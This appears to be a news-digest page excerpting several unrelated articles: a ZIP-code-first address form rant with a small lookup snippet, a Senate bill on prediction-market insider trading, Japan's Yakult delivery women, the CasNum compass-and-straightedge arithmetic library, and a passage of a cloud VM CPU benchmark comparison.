10 interesting stories served every morning and every evening.
Bridge the gap between coding intent and action: manipulate syntax structures directly, avoiding mouse or keyboard gymnastics. Amplify your coding efficiency: wield multiple cursors for parallel syntax node operations, revolutionizing bulk edits and refactoring. Selection Modes standardize movements across words, lines, syntax nodes, and more, offering unprecedented flexibility and consistency.
...
Read the original on ki-editor.org »
A US ZIP code is 5 characters. From those 5 characters you can determine the city, the state, and the country. That’s 3 fields. Autofilled. From one input.
But you don’t do that, do you? No. You make me type my street address, then my city, then scroll through a dropdown of 50 states to find Illinois wedged between Idaho and Indiana, then type my ZIP, then — the pièce de résistance — scroll through 200+ countries to find United States, which half the time is filed under “T” because some dipshit thought “The United States of America” was the correct sort key.
It’s 2026. What the fuck are we doing.
I type 90210. You now know I’m in Beverly Hills, California, United States. You didn’t need me to tell you that. You didn’t need a dropdown. You didn’t need me to scroll past Turkmenistan. You had the answer the entire time, in 5 digits, and you just… didn’t use it.
And here’s the bonus: once you know the ZIP, your street address autocomplete is searching a few thousand addresses instead of 160 million. It’s faster. It’s more accurate. I type less. You get cleaner data. Everyone wins.
This is not new technology. Free APIs exist. It’s like 4 lines of code. Look:
const res = await fetch(`https://api.zippopotam.us/us/${zip}`)
const data = await res.json()
city.value = data.places[0]["place name"]
state.value = data.places[0]["state"]
country.value = "United States"
That’s it. That’s the whole thing. You could have shipped this instead of reading this website.
See how that works? See how you typed 5 numbers and 3 fields filled themselves in? See how you’re now typing your street address and it already knows what city you’re in? That’s not magic. That’s a lookup table. We’ve had those since the 1960s.
Tier 1: ZIP at the bottom. Street, city, state, ZIP, country. You had the data to autofill 3 fields and you just… put it last. Amazon does this. Target does this. Walmart does this. Basically everyone does this. Billions of collective hours of human life, spent scrolling for “Illinois.”
Tier 2: No autofill at all. You collect the ZIP. You have the ZIP. You do nothing with it. The ZIP just sits there in your database, inert, like a fire extinguisher in a glass case that says “do not break.” What are you saving it for.
Tier 3: The scrollable country dropdown. 240 countries. No search. No type-ahead. Just pure, unfiltered, alphabetical scrolling. Bonus points if the US is under “T.” Extra bonus points if it’s not even alphabetical. You absolute psychopaths.
Tier 4: The form that resets when you hit back. I filled out 14 fields. Your payment processor failed. I hit back. Everything is gone. My street. My city. My state. My will to live. All of it. Returned to the void. The developer responsible for this sleeps eight hours a night. That’s the part that haunts me.
While we’re here:
Invoke the right keyboard. If you’re asking for a ZIP code, use inputmode="numeric". It’s one HTML attribute. On mobile, I should see a number pad, not a full QWERTY keyboard. This applies to phone numbers, credit cards, and anything else that’s obviously just digits. You already know the input type. Tell the phone.
Work with autofill, not against it. Browsers have had autofill for over a decade. Use the right autocomplete attributes — postal-code, address-line1, country. If your form fights the browser’s autofill, your form is wrong. The browser is trying to save your user 45 seconds. Let it.
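For the record, those two fixes are one attribute each. The field names below are made up; the attributes are the real ones:

<input name="zip" inputmode="numeric" autocomplete="postal-code">
<input name="street" autocomplete="address-line1">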
Fine, maybe country first. The purists in the comments are technically correct — postal codes aren’t globally unique. You could do country first (pre-filled via IP), then postal code, then let the magic happen. The point was never “skip the country field.” The point is: stop making me type things you already know.
Found a site that puts the ZIP code last? A country dropdown sorted by vibes? A form that makes you cry?
Send it to us →
Put the ZIP code first. Autofill the city. Autofill the state. Autofill the country. Let the user type their street address last, with autocomplete scoped to their ZIP.
It is a solved problem. The API is free. The code is 5 lines. There is genuinely no reason not to do this other than the mass institutional inertia of a million product managers copy-pasting the same address form template from 2009 and never once asking “wait, why is the ZIP code at the bottom?”
Why is the ZIP code at the bottom?
Put it first, you animals.
Share this before you have to fill out another address form.
...
Read the original on zipcodefirst.com »
Effort comes after reports of individuals suspiciously earning massive payouts before Iran Strikes, Venezuela Military Actions
Washington, D.C. — Today, Oregon’s U.S. Senator Jeff Merkley and Minnesota’s U.S. Senator Amy Klobuchar launched a new effort to prevent government officials at the highest levels from engaging in prediction markets, cracking down on the potential for any insider trading.
Following multiple public reports on the growing influence of prediction markets and their potential for corruption, Merkley and Klobuchar introduced the End Prediction Market Corruption Act—a new bill to ban the President, Vice President, Members of Congress, and other public officials from trading event contracts. The bill will ensure that federal elected officials maintain their oath of office to serve the people by preventing them from trading on information that they gained through their role.
“When public officials use non-public information to win a bet, you have the perfect recipe to undermine the public’s belief that government officials are working for the public good, not for their own personal profits,” said Merkley. “Perfectly timed bets on prediction markets have the unmistakable stench of corruption. To protect the public interest, Congress must step up and pass my End Prediction Market Corruption Act to crack down on this bad bet for democracy.”
“At the same time that prediction markets have seen huge growth, we have seen increasing reports of misconduct. This legislation strengthens the Commodity Futures Trading Commission’s ability to go after bad actors and provides rules of the road to prevent those with confidential government or policy information from exploiting their access for financial gain,” said Klobuchar.
Merkley and Klobuchar’s End Prediction Market Corruption Act is cosponsored by U.S. Senators Chris Van Hollen (D-MD), Adam Schiff (D-CA), and Kirsten Gillibrand (D-NY).
Their bill is supported by Public Citizen, Citizens for Responsibility and Ethics in Washington (CREW), and Project On Government Oversight (POGO).
“The American people deserve unwavering ethical standards from their government officials. Officials have a responsibility to avoid not only actual conflicts of interest but even the appearance of impropriety. POGO is pleased to endorse the End Prediction Market Corruption Act, which will further prohibit covered government officials from exploiting nonpublic information for personal gain in prediction markets,” said Janice Luong, Policy Associate for the Project On Government Oversight (POGO).
“It is now more important than ever that prediction markets be governed by ethical constraints, especially when it comes to bets placed by governmental officials. Sen. Merkley’s legislation would appropriately prohibit key government officials from buying or selling on the prediction markets contracts in which they could have insider information on changes in the market. Public Citizen heartily endorses this bill,” said Craig Holman, Ph.D., Public Citizen.
“The rapid rise of retail prediction markets creates the risk that officials across the government could use nonpublic information to trade on and profit off event contracts,” said Debra Perlin, Vice President of Policy of Citizens for Responsibility and Ethics in Washington (CREW). “The American people must be able to trust that their government officials are working on their behalf rather than for personal gain. Senator Merkley’s legislation represents a vital step forward to ensure that those in positions of power, including senior executive branch officials and members of Congress, cannot abuse their access to nonpublic information in order to profit.”
Merkley has been a long-time leader in the push to end public corruption. He has led the charge to crack down on election gambling and dark money in politics, prevent lawmakers from trading stocks, and ban cryptocurrency-related corruption by elected officials at the highest levels of the federal government.
Full text of the End Prediction Market Corruption Act can be found by clicking here.
...
Read the original on www.merkley.senate.gov »
As loneliness deepens in one of the world’s fastest-ageing nations, a network of women delivering probiotic milk drinks has become a vital source of routine, connection and care.
A woman in a neat navy suit and powder-blue shirt cycles purposefully down a quiet residential street in Tokyo. It’s 08:30 but already balmy, and she’s grateful for the matching visor that shields her eyes from the summer sun.
She arrives at her first stop, parks her bike and knocks on the door of a small wooden house with potted plants flanking the entrance. Inside, an elderly woman waits. Her face breaks into a broad smile as she opens the door — she has been expecting this visit.
Japan is the world’s most rapidly ageing major economy. Nearly 30% of its population is now over 65, and the number of elderly people living alone continues to rise. As families shrink and traditional multi-generational households decline, isolation has become one of the country’s most pressing social challenges.
The suited woman is a Yakult Lady — one of tens of thousands across Japan who deliver the eponymous probiotic drinks directly to people’s homes. On paper they’re delivery workers, but in practice they’re part of the country’s informal social safety net. In a country grappling with a rapidly ageing population and a deepening loneliness crisis, Yakult Ladies have become an unlikely source of community, helping to reduce the problem of isolation one drop-off at a time.
With their distinctive squat plastic bottles and shiny red caps, Yakult pioneered a genre. The probiotic drink was launched in Japan 90 years ago — long before “microbiome” became common parlance. But today, the women who deliver them are as important to the brand’s identity as the product itself.
...
Read the original on www.bbc.com »
CasNum (Compass and straightedge Number) is a library that implements arbitrary precision arithmetic using compass and straightedge constructions. Arbitrary precision arithmetic, now with 100% more Euclid. Featuring a functional modified Game Boy emulator where every ALU opcode is implemented entirely through geometric constructions.
This project began with a simple compass-and-straightedge ‘engine’, which can be found under the directory cas/. In compass-and-straightedge constructions, one starts with just two points: the origin, and a unit. Exactly as God intended. The engine then allows us to do what the ancients did:
* Construct the line through two points
* Construct the circle that contains one point and has a center at another point
* Construct the point at the intersection of two (non-parallel) lines
* Construct the one or two points in the intersection of a line and a circle (if they intersect)
* Construct the one point or two points in the intersection of two circles (if they intersect) (which, by the way, turns out to be a nasty 4th degree equation. Check out the formula in circle.py, over 3600 characters, yikes. Good thing we have WolframAlpha).
These five constructions are considered the basic compass and straightedge constructions. Think of these as your ISA.
On top of the compass-and-straightedge engine, we have the CasNum class. In CasNum, a number x is represented as the point (x,0) in the plane. Now, the fun part: implementing all arithmetic and logical operations. We can construct the addition of two points by finding the midpoint between them and doubling it, which are both standard compass-and-straightedge constructions. Then, we can build the product and quotient of numbers using triangle similarity. The logical operations (AND, OR, XOR) are a little uglier, since they are not a “clean algebraic operation” in the relevant sense, but, hey, it works right?
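To make that concrete, here is the addition trick in plain coordinates - a sketch of the idea, not the library’s actual API:

def add(x, y):
    # A number x is represented as the point (x, 0). The midpoint of
    # (x, 0) and (y, 0) is a standard compass-and-straightedge construction...
    mid = (x + y) / 2
    # ...and doubling the segment from the origin through the midpoint
    # lands exactly on x + y.
    return 2 * mid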
What I thought was pretty neat is that implementing all this from scratch leaves a lot of room for optimization. For example, multiplication by 2 can be implemented much more efficiently than the generic algorithm for multiplication using triangle similarity. Then, implementing modulo by first removing the highest power of two times the modulus from the dividend yielded much better results than the naive implementation.
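In plain integers, that modulo trick looks roughly like this (a sketch of the idea, not the actual CasNum code):

def mod(a, m):
    # Naive modulo subtracts m from a over and over. Instead, subtract the
    # largest m * 2**k that still fits: doubling is one of the cheapest
    # constructions, so building m, 2m, 4m, ... costs very little.
    while a >= m:
        t = m
        while t * 2 <= a:
            t *= 2  # the cheap multiply-by-2 construction
        a -= t      # subtraction is a standard construction
    return a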
With the arithmetic in place, the goals were to:
* Run a basic arithmetic demo
* Run RSA encryption
* Integrate into the ALU of a Game Boy emulator, thus obtaining a Game Boy that arithmetically and logically runs solely on compass and straightedge constructions
The first two examples were actually implemented and can be found under the examples/ directory. So apparently one cannot square the circle using a compass and a straightedge, but at least one can run Pokémon Red. Man, I’m sure the ancient Greeks would have loved to see this.
Thanks to the great code written by PyBoy, integrating CasNum within it was pretty seamless. The only file I needed to edit was opcodes_gen.py, and the edit was pretty minimal.
As always, please save any important work before running anything I ever write.
To clone the repo, and install requirements:
git clone --recursive git@github.com:0x0mer/CasNum.git
cd CasNum
pip install -r requirements.txt
You can run the rsa and basic examples from the repo’s root directory like so:
python3 -m examples.basic
python3 -m examples.rsa
The library comes with a viewer (casnum/cas/viewer.py) that shows the compass and straightedge constructions. It has an automatic zoom that kinda works, but it goes crazy in the rsa example, so you may want to use manual zoom there.
In order to run PyBoy, first you need a ROM. In order to avoid copyright infringement, I included the ROM for 2048, free to distribute under the zlib license. But if, for example, the ROM you have is ‘Pokemon.gb’, then you can place it in examples/PyBoy and run:
cd examples/PyBoy
pip install -r requirements.txt
PYTHONPATH=../.. python
Then, once in python, run:
from pyboy import PyBoy
from casnum import viewer
viewer.start()
pyboy = PyBoy('2048.gb') # Or whatever ROM you have
while pyboy.tick():
pass
pyboy.stop()
The viewer.start() call just displays the compass-and-straightedge constructions; it is not strictly needed, but it is fun.
Notice, however, that the first run of Pokemon on the Game Boy emulator takes approximately 15 minutes to boot, so playing it may require somewhat increased patience. You see, Euclid wouldn’t have optimized the Game Boy boot screen. He would have spent those 15 minutes in silent appreciation, thinking, “Yeah. That’s about how long that should take.”
After running it once, most calculations should already be cached if you run it from the same python interpreter instance, so on the second run you should be able to get a decent 0.5~1 FPS, which is totally almost playable.
Most modern developers are content with a + b. They don’t want to work for it. They don’t want to see the midpoint being birthed from the intersection of two circles.
CasNum is for the developer who believes that if you didn’t have to solve a 4th-degree polynomial just to increment a loop counter, you didn’t really increment it.
Python’s lru_cache is used to cache almost any calculation done in the library, as everything is so expensive. Memory usage may blow up; run at your own risk.
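The pattern is roughly the following (an illustrative function, not the library’s actual code):

from functools import lru_cache

@lru_cache(maxsize=None)  # unbounded cache - also why memory can blow up
def double(x):
    # Stand-in for an expensive construction (imagine a pile of circle
    # intersections here); repeated calls with the same input are free.
    return 2 * x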
* pyglet (optional but highly recommended. Only needed if you want to display the compass-and-straightedge constructions)
* pytest-lazy-fixtures (Only needed in order to run the tests)
* pycryptodome (Only needed if you want to run the rsa example)
A: It can’t really “run” anything; it’s a number.
A: Define “fast”. If you mean “faster than copying Euclid by hand”, then yes, dramatically.
Q: Why did you make this?
A: I wanted arbitrary precision arithmetic, but I also wanted to feel something.
The code in the root of this repository is licensed under the MIT License.
This project incorporates the following third-party materials:
PyBoy (Modified): Located in ./examples/PyBoy/. Distributed under the GNU Lesser General Public License (LGPL) v3.0.
Notice of Modification: This version of PyBoy has been modified from the original source code to use the CasNum library instead of Python’s int.
The original, unmodified source code for PyBoy can be found at: https://github.com/Baekalfen/PyBoy.
The full LGPL license text is available in ./examples/PyBoy/License.md.
2048.gb: This Game Boy ROM binary is distributed under the zlib License.
Disclaimer: This software is provided ‘as-is’, without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software.
...
Read the original on github.com »
Time for the (not exactly) yearly cloud compute VM comparison. I started testing back in October 2025, but the benchmarking scope was increased, not just due to more VM families tested (44), but also due to testing the instances over more regions to attain a possible range of performance, as in many cases not all instances are created equal. I will not spoil much if I tell you that there is one new CPU that dominates the top-end results more clearly than any previous year.
Like last time, this is all about generic CPU performance and especially what you can actually get per $ spent on compute VM instances. Due to the focus on CPU workloads, burstable instances are not included. Single-thread performance is evaluated separately, as there are always workloads that cannot be further parallelized. For multi-thread, each instance type is tested in a 2vCPU configuration which is usually the minimum unit you can order (it corresponds to a single core for SMT-enabled systems, like all Intel and most AMD). The more threads your workload can utilize, the more multiples of that unit you can order.
The comparison should help you maximize performance or price depending on your requirements, by either using the optimal VM types of your provider, or perhaps by launching on a different provider.
If you don’t need all the details, you can use the TOC below to jump to what’s relevant to you.
I kept the same 7 providers as last year (down from a maximum of 10 providers in the 2023 comparison), but expanded to 44 VM types tested.
New CPUs: AMD EPYC Turin (whose performance I had explored separately) and Intel Granite Rapids are available on the x86 front, while several new ARM solutions are tested: Google Axion (also explored separately last year), Azure Cobalt 100 and Ampere AmpereOne M.
More testing: Some extra benchmarks added. More testing across regions. In the past I only focused on that for small providers, but the big-three have also shown inconsistency, so the main performance and performance/price numbers will show a range.
As mentioned, I will focus on 2x vCPU instances, as that’s the minimum scalable unit for a meaningful comparison (and generally minimum for several VM types), given that most AMD and Intel instances use Hyper-Threading (HT) / Simultaneous Multi Threading (SMT). So, for those systems a vCPU is a Hyper-Thread, or half a core, with the 2x vCPU instance giving you a full core with 2 threads. This will become clear in the scalability section.
I am skipping some very old instance types that are obviously uncompetitive. I am still trying to configure at 2GB/vCPU of RAM (which is variably considered as “compute-optimized”, or “general-purpose”) and 30GB SSD (not high-IOPS) boot disk for the price comparison to make sense (exceptions will be noted).
The pay-as-you-go/on-demand prices refer to the lowest-cost region in the US (or Europe). For providers with variable pricing, cheapest regions are almost always in the US. Unlike last year, I will not include the 100% sustained-use discounts for GCP, as they are not technically on-demand - so I may have been unfair to the other providers last year.
For providers that offer 1 year and 3 year committed/reserved discounted prices, the no-downpayment price was listed with that option. The prices were valid for January 2026 - please check for current prices before making final decisions.
As a guide, here is an overview of the various generations of AMD, Intel and ARM CPUs from older (top) to newer (bottom), roughly grouped horizontally in per-core performance tiers, based on this and the previous comparison results:
This should immediately give you an idea of roughly what performance tier to expect based on the CPU type alone, with the important note that for SMT-enabled instances you get a single core for every 2x vCPUs.
A general tip is that you should avoid old CPU generations, as due to their lower efficiency (higher running costs) the cloud providers will actually charge you more for less performance. I will even not include types that were already too old to provide good value last year, to focus on the more relevant products.
Amazon Web Services (AWS) pretty much originated the whole “cloud provider” business - even though smaller connected VM providers predated it significantly (e.g. Linode comes to mind) - and still dominates the market. The AWS platform offers extensive services, but, of course, we are only looking at their Elastic Compute Cloud (EC2) VM offerings for this comparison.
There are 2 new CPUs introduced since last year. Intel’s Granite Rapids makes an appearance, while the AMD EPYC Turin-powered C8a follows the previous C7a in having SMT disabled (providing a full core per vCPU). I don’t want to spoil much, but if you take the fastest CPU by a margin, and disable SMT, expect some impressive “per-2vCPU” results…
With EC2 instances you generally know what you are getting (instance type corresponds to specific CPU), although there’s a multitude of ways to pay/reserve/prepay/etc which makes pricing very complicated, and pricing further varies by region (I used the lowest cost US regions). In the 1Y/3Y reserved prices listed, there is no prepayment included - you can lower them a bit further if you do prepay. The spot prices vary even more, both by region and are updated often (especially for newly introduced types), so you’d want to keep track of them.
* min_cpu_platform needs to be set to get tested CPU.
** Extrapolated 2x vCPU instance - type requires 4x vCPU minimum size.
The Google Cloud Platform (GCP) follows AWS quite closely, providing mostly equivalent services, but lags in market share (3rd place, after Microsoft Azure). We are looking at the Google Compute Engine (GCE) VM offerings, which is one of the most interesting in respect to configurability and range of different instance types. However, this variety makes it harder to choose the right one for the task, which is exactly what prompted me to start benchmarking all the available types. To add extra confusion, some types may come with an older (slower) CPU if you don’t set min_cpu_platform to the latest available for the type - so you need the extra configuration to get a faster machine for the same price.
This year, we have the addition of the AMD EPYC Turin (c4d and n4d); they are not yet in all regions/zones, but availability is expanding. We also had the introduction of two Intel-based 4th gen instances (n4 and c4). They both feature Emerald Rapids; however, the latter can be configured with a local SSD, in which case they come with the newer Intel Granite Rapids. Until GCP allows setting min_cpu_platform to Granite Rapids (they are thinking about it AFAIK), you have to pay for the extra SSD to get the performance. Last year I covered separately the introduction of the Google Axion-powered c4a ARM type, but it is in a full VM comparison for the first time.
At this point, I should mention that the reason I did more extensive testing this year across different regions is the disappointing performance of Emerald Rapids in practice, compared to its showing on my original benchmarks. It seems that as it started to get used, it exhibited a performance variance that looks consistent with boost behavior + node contention (i.e. more sensitive to noisy neighbors). I suspect this is why GCP offers the option to turn boost clock off in Emerald Rapids instances for “consistent performance”.
GCP prices vary per region and feature some strange patterns. For example when you reserve, t2d instances which give you a full AMD EPYC core per vCPU and n2d instances which give you a Simultaneous Multi-Thread (i.e. HALF a core) per vCPU have the same price per vCPU, but n2d is cheaper on demand and gets a 20% discount for sustained monthly use.
Note that c3, c3d and c4-lssd types have a 4x vCPU minimum. This breaks the price comparison, so I am extrapolating to a 2x vCPU price (half the cost of CPU/RAM + full cost of 30GB SSD). GCP gives you the option to disable cores (you select “visible” cores), so while you have to pay for 4x vCPU minimum, you can still run benchmarks on a 2x vCPU instance for a fair comparison.
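In other words, with made-up numbers, the extrapolation looks like this:

# Hypothetical figures, purely to illustrate the extrapolation:
price_4vcpu = 120.0  # monthly price of the 4x vCPU minimum config, incl. 30GB SSD
price_ssd = 5.0      # monthly price of the 30GB boot SSD alone
price_2vcpu = (price_4vcpu - price_ssd) / 2 + price_ssd  # half the CPU/RAM, full SSD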
Azure is the #2 overall Cloud provider and, as expected, it’s the best choice for most Microsoft/Windows-based solutions. That said, it does offer many types of Linux VMs, with quite similar abilities as AWS/GCP. The various types are not as easy to use as on AWS/GCP though: for some reason even enterprise accounts start with zero quota on many types, so I had to request quota increases to even test tiny instances.
The v6 instances are new for the comparison, featuring AMD EPYC Genoa, Intel Emerald Rapids and Azure’s own Cobalt 100 ARM CPU.
The Azure pricing is at least as complex as AWS/GCP, plus the pricing tool seems worse. They also lag behind the other two major providers in CPU releases - Turin and Granite Rapids are still in closed preview at the time of writing this.
Oracle Cloud Infrastructure (OCI) was the biggest surprise in my 2023 comparison test. It was a pleasant surprise: not only does Oracle offer by far the most generous free tier (credits for the A1 type ARM VM equivalent to a sustained 4x vCPU, 24GB RAM, 200GB disk for free, forever), their paid ARM instances were the best value across all providers - especially for on-demand. The free resources are enough for quite a few hobby projects - they would cost you well over $100/month in the big-3 providers.
Note that registration is a bit draconian to avoid abuse: make sure you are not on a VPN, and also don’t use oracle anywhere in the email address you use for registration. You start with a “free” account, which gives you access to a limited selection of services, and apart from the free-tier eligible A1 VMs, you’ll struggle to build any other types with the free credit you get at the start.
Upgrading to a regular paid account (which still gives you the free tier credits), you get a selection of VMs. New this year are the AMD EPYC Turin Standard.E6 VMs and the next generation ARM Standard.A4 type powered by the AmpereOne M CPU. If you recall from last year, the AmpereOne A2 instances were slower in quite a few tasks than the older Altra A1. Ampere really needed a step forward, and AmpereOne M (A4) finally delivers meaningful gains in this year’s dataset. I had trouble building older-gen AMD instances, so in the end I did not include them. I also could only build Standard.A4 in one region (Ashburn), even though I tried in Phoenix, which Oracle had in the availability list, to no avail.
Oracle Cloud’s prices are the same across all regions, which is nice. They do not offer any reserved discounts, but do offer a 50% discount for preemptible (spot) instances. One complication is that their prices are per “Oracle CPU” (OCPU). This seemed to make sense originally, as it corresponded to physical cores - the A1 instances had 1 OCPU per core, so 1 OCPU = 1 vCPU, while SMT x86 had 1 OCPU = 2 vCPU (threads). But then, possibly thinking that their users were getting comfortable with it, they threw a wrench by making 1 OCPU for the newer (still non-SMT) ARM types A2 and A4 equal to 2 vCPU / 2 full cores. I can’t think of a reason for this other than to confuse their customers.
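To summarize the mapping that results (as I understand their pricing):

# How many vCPUs (and what kind) one OCPU buys, per the pricing described above:
vcpus_per_ocpu = {
    "x86 with SMT (e.g. E6)": 2,  # 2 threads = 1 physical core
    "Ampere Altra (A1)": 1,       # 1 full core
    "AmpereOne (A2, A4)": 2,      # 2 full cores (!)
}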
Linode, the venerable cloud provider (predating AWS by several years), has now been part of Akamai for a few years.
From the previous years we saw that their shared core types (“Linodes”) are the best bang for buck, but it depends on what CPU you are assigned on creation. It seems that currently the most common configuration features an AMD EPYC Milan. I tried to build quite a few and that’s what you usually get (if you manage to build an ancient Intel or AMD Rome, try again); I did not see any newer CPUs pop up. The latest EPYC Turin though is available as a dedicated CPU instance. They now mark dedicated instances with their generation, so a G8 should always be the same CPU. As always, the dedicated instances come with SMT, so you are normally getting a core per 2 vCPUs, while the shared instances are virtual cores, so twice the vCPUs gives you twice the multi-thread performance - the caveat is that performance per thread varies depending on how busy the node that holds your VM is.
It is a bit of an annoyance that without testing your VM after creation you can’t be sure of what performance to expect, unless you go for the more expensive dedicated VMs, but otherwise, Akamai/Linode is still easy to set up and maintain and has fixed, simple pricing across regions.
DigitalOcean was close to the top of the perf/value charts a few years ago, providing the best value with their shared CPU Basic “droplets”. I am actually using DigitalOcean droplets to help out by hosting a free weather service called 7Timer, so feel free to use my affiliate link to sign up and get $200 free - you will help with the free project’s hosting costs if you end up using the service beyond the free period. Apart from value, I chose them for the simplicity of setup, deployment, snapshots, backups.
However, they seem to have stopped upgrading their fleet for quite a while now, so you end up with some very old CPUs. If you don’t mind the low per-thread performance, they are still not a bad value, given the low prices. I like their simple, region-independent and stable pricing structure, but I wish they would upgrade their shared core data centers.
Hetzner is a quite old German data center operator and web host, with a very budget-friendly public cloud offering. They are often recommended as a reliable extra-low-budget solution, and I’ve had much better luck with them than other similar providers.
On the surface, their prices seem to be just a fraction of those of the larger providers, so I did extended benchmark runs over days to make sure there is no significant oversubscribing - except perhaps the cheapest variant (CX23). Only the CCX13 claims dedicated cores. Ironically, those dedicated instances vary significantly in performance depending on which data center you create them in. In the end, the CPX22 (AMD) and CAX11 (ARM) shared core instances are the most stable in performance across instances and regions.
Note that the cheap shared-core types are not widely available, not found in the US regions and they even show no availability at times in the European regions. And while I included a CX23 with EPYC Rome, you will normally get a slower Skylake. I will not include the shared instances in the price/performance charts this time around, as I am thinking that the limited availability does not make them equal contenders.
In order to have many more test runs, I streamlined the test suite into a docker image which you can run yourself (the exact command is in the original post). Almost all instances were on 64bit Debian 13, although I had to use Ubuntu 24.04 on a couple, and Oracle’s ARM were only compatible with Oracle Linux.
As every year, the main weight is on my own benchmark suite, DKbench, which you can now also run from its own docker image (again, the command is in the original post). It has proven very good at approximating real-world performance differences in the type of workloads we use at SpareRoom, and is also good at comparing single and multi-threaded performance (with scaling to hundreds of threads if needed).
I created multiple instances in different regions and recorded min and max of all runs (both single-thread and dual-thread).
I have kept Geekbench, both because it can help you compare results from previous years and because Geekbench 6 seems to be much worse - especially in multi-threaded testing (I’d go as far as to say it looks broken to me).
I simply kept the best of 2 runs; you can browse the results here. There’s an Arm version too at https://cdn.geekbench.com/Geekbench-5.4.0-LinuxARMPreview.tar.gz.
Apart from being popular, Phoronix benchmarks can help benchmark some specific things (e.g. AVX512 extensions) and also results are openly available.
Very common application and very common benchmark - average compression/decompression scores are recorded.
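Presumably via 7-Zip’s built-in benchmark mode, i.e. something along the lines of:

7z b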
Select option 1. This benchmark uses SSE/AVX up to AVX512, which might be important for some people. Older CPUs that lack the latest extensions are at a disadvantage.
Blender’s Big Buck Bunny video was transcoded to an H264 mp4 via FFmpeg, both in single and dual-thread mode.
The raw results can be accessed on this spreadsheet (or here for the full Geekbench results).
In the graphs that follow, the y-axis lists the names of the instances, with the CPU type in parentheses:
Single-thread performance can be crucial for many workloads. If you have highly parallelizable tasks you can add more vCPUs to your deployment, but there are many common types of tasks where that is not always a solution. For example, a web server can be scaled to service any number of requests in parallel, however the vCPU’s thread speed determines the minimum response time of each request.
We start with the latest DKbench, running the 19 default benchmarks (Perl & C/XS) which cover a variety of common server workloads. I tried to build 2-3 instances at different times across at least 3 regions (if the provider allowed), to get a min/max range of performance. Here are the results for single thread:
I think it’s the first time in my series of comparisons where a CPU had this clear of a performance lead. AMD’s EPYC Turin is simply a tier above anything else. AWS has the fastest setup with that CPU, while GCP’s more expensive C4d seems to vary a lot in performance, with their cheaper N4d giving more consistent results. Overall, if you are looking for maximum performance per thread, EPYC Turin seems to be the answer if your cloud provider has it.
In the 2024 comparison Intel Emerald Rapids did quite well, but it turns out that was only on non-busy nodes, where the CPU allows for a generous boost - at least for GCP. This is reflected in the range you see on the graph. The new Granite Rapids seems to fix this, providing a bit higher, but mainly more stable performance. So, a solid step forward from Intel, it’s just that Turin is really impressive.
As we are waiting for AWS to release Graviton5 publicly, GCP’s Axion is the leader for ARM solutions, impressively offering EPYC Genoa-level performance per thread. I tested Azure’s own Cobalt 100 for the first time - it sits between Graviton3 and Graviton4 performance. Ampere’s new AmpereOne M finally offers some tangible improvement over the aging Altra, but only matches AWS’s older Graviton3.
Lastly, among the lower-cost providers, DigitalOcean has lagged behind in performance, signaling that their fleet is due for an upgrade. Both Akamai and Hetzner offer some fast Milan instances, although for both providers you are not guaranteed what performance level you are going to get when creating an instance - there is the variation shown in the chart. It’s not oversubscribing, the performance is stable; it’s just that groups of servers are set up differently.
DKbench runs the benchmark suite single-threaded and multi-threaded (2 threads in this comparison as we use 2x vCPU instances) and calculates a scalability percentage. The benchmark obviously uses highly parallelizable workloads (if that’s not what you are running, you’d have to rely more on the single-thread benchmarking). In the following graph 100% scalability means that if you run 2 parallel threads, they will both run at 100% speed compared to how they would run in isolation. For systems where each vCPU is 1 core (e.g. all ARM systems), or for “shared” CPU systems where each vCPU is a thread among a shared pool, you should expect scalability near 100% - what is running on one vCPU should not affect the other when it comes to CPU-only workloads.
Most Intel/AMD systems though give you a single core that has 2x threads (Hyper-Threads / HT in Intel lingo - or Simultaneous Multi Threads / SMT if you prefer) as a 2x vCPU unit. Those will give you scalability well below 100%. A 50% scalability would mean you have the equivalent of just 1x vCPU, which would be very disappointing. Hence, the farther up you are from 50%, the more performance your 2x vCPUs give you over running on a single vCPU.
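As a formula, with hypothetical scores (my reading of the metric as described):

single_thread_score = 10.0  # suite score with 1 thread running alone
dual_thread_score = 17.0    # suite score with 2 threads running in parallel
scalability = 100 * dual_thread_score / (2 * single_thread_score)  # -> 85%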
As expected, the ARM and shared CPUs are near 100%, i.e. you are getting twice the multithreaded performance going from 1x to 2x vCPUs. You also get that from three x86 types: AWS’s Genoa C7a and Turin C8a alongside GCP’s older Milan t2d.
From the rest we note that, traditionally, AMD does SMT better than Intel, although the latter has improved from the dismal Ice Lake days when it barely managed over 50%.
Bizarrely, the Akamai AMD Turin gives an unusually high (given SMT) scalability of 71.9%. I have verified the result several times, and I can’t figure out what their setup is - the single-threaded performance at the same time is very low compared to every other Turin.
From the single-thread performance and scalability results we can guess how running DKbench multithreaded will turn out, but in any case here it is:
Give the clearly fastest instance two full cores instead of threads and you get the Turin-powered AWS C8a completely dominating the chart. Interestingly, the Google Axion seems at least as good here as the leader from the previous comparison, the Genoa C7a - with Graviton4 very close and Cobalt 100 trailing not far behind.
The SMT-enabled Turin instances follow, with the top 10 completed by the venerable Milan in a non-SMT Tau instance. Long-time followers of these comparisons may remember this was the top of the chart in the 2023 edition.
At the bottom, as expected, we have the very old Intel Broadwell/Skylake, the not-as-old Ice Lake, and AMD Rome.
The old Geekbench 5 is provided for comparison reasons (and I don’t trust Geekbench 6):
Both for single and multi-core, the results are very close to what we get with DKbench. Which is a good thing, as both suites try a range of benchmarks to get a balanced generic CPU score.
Moving on to some popular specific benchmarks - starting with 7zip which is sensitive to memory latency and cache:
While Turin still leads overall, Axion and Graviton4 are impressive and actually even beat it in the decompress part of the benchmark. In fact, Cobalt 100 is the top performer for decompression, but overall the ARM solutions show great performance.
Another Turin showcase, with the non-SMT AWS C8a in particular almost doubling the score of the second and tripling the score of the C7a. Granite Rapids is also making a great showing.
It’s the first time I am running this popular benchmark, and I am a bit puzzled about some of the Milan types coming last.
Another first for this comparison is video compression using FFmpeg and libx264. Results for both single and dual-thread mode:
Once more, EPYC Turin comes first. If we look at single-thread performance, only Granite Rapids comes somewhat close. When using 2 full cores, Axion can pull ahead of all SMT (i.e. single core) instances except Turin.
Lastly, in case you have software that can be accelerated by AVX512, I am including an OpenSSL RSA4096 benchmark. They are Intel’s extensions so they are on all their CPUs since Skylake, whereas Genoa was the first AMD CPU to implement them. Older AMD CPUs and ARM architectures will be at a disadvantage in this benchmark:
Like in our previous comparison, AMD outperforms Intel at their own game. It’s quite a margin for Turin and even Genoa is ahead of anything Intel. Intel does not seem to be prioritising vector performance, as even the latest Granite Rapids does not bring much improvement over the aging Ice Lake.
As expected, ARM and older AMD CPUs that don’t support AVX512 are slower than Intel Skylake and newer.
One factor that is often even more important than performance itself is the performance-to-price ratio.
